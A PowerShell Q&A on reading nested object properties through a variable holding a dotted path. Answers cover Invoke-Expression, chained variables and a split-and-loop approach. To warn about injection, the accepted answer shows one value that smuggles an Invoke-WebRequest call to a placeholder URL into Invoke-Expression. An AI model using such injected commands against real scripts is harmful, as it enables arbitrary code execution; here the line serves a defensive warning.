# Can I access an object's nested properties using a variable?

Tags: powershell

Suppose I have the following:

```
(Get-Date).psobject.Properties.Name
```

I can use a variable to access properties:

```
$x = Name
(Get-Date).psobject.Properties.$x
```

However, I cannot use $x to "expand" nested properties:

```
$x = 'psobject.Properties.Name'
(Get-Date).$x
```

Because in this case Powershell is treating $x as if the entire string is a literal property name.

I've found plenty of resources on different ways to access properties with special characters, but none on how one might do the opposite.

Is this possible? If not, why?

Comment: `iex "(Get-Date).$x"`

Comment: Is that the only way? @BenH I thought using iex was bad practice.

Comment: When you reference `$o.$x`, it'll look for a member of `$o` with the same name as the value of `$x` - a `datetime` struct has no member called `psobject.Properties.Name`, so no that's not possible. You could chain them though: `$x,$y,$z = 'psobject','Properties','Name'; (Get-Date).$x.$y.$z`

Comment: There are probably other better ways to do it. `iex` is just easy because is solves the immediate problem. `iex` gets a lot of heat for the ability to take arbitrary code (e.g. from an `iwr`) and execute it. It opens up the dangers of unsantized inputs. Here's another solution with a loop. `$a = (Get-Date); $b = 'psobject.Properties.Name'.split('.'); $b | % {if ($_ -ne $b[-1]) {$a = $a.$_} else {$a.$_}}`

Answer (score 7, accepted):

An interesting feature of PowerShell is that you can have properties that contain a period. For example:

```
[pscustomobject]@{'a.b.c' = 'example'}
```

This means that in your question since `$x` is string, `(Get-Date).$x` won't be parsed in dot notation as separate property names. But as `(Get-Date).'psobject.Properties.Name'`

The lazy way around this is to use `Invoke-Expression` to first build the string before evaluation.

```
$x = 'psobject.Properties.Name'
Invoke-Expression "(Get-Date).$x"
```

This is usually acceptable as long as the definition of `$x` is a static value that you defined. But if something else sets the definition of `$x`, you can get into a [Bobby Tables situation](https://xkcd.com/327/) with arbitrary code being executed. For example:

```
$x = 'psobject.Properties.Name; Invoke-WebRequest http://example.com/superdangerouscode!!!'
Invoke-Expression "(Get-Date).$x"
```

So if you can rely on your definition of `$x` to be in a dot delimited notation, you could use the `split()` method on dots to turn the value into an array to loop over.

```
$Date = (Get-Date)
$Properties = 'psobject.Properties.Name'.split('.')
$Properties | ForEach-Object {
    if ($_ -ne $Properties[-1]) {
        #iterate through properties
        $Date = $Date.$_
    } else {
        #Output last value
        $Date.$_
    }
}
```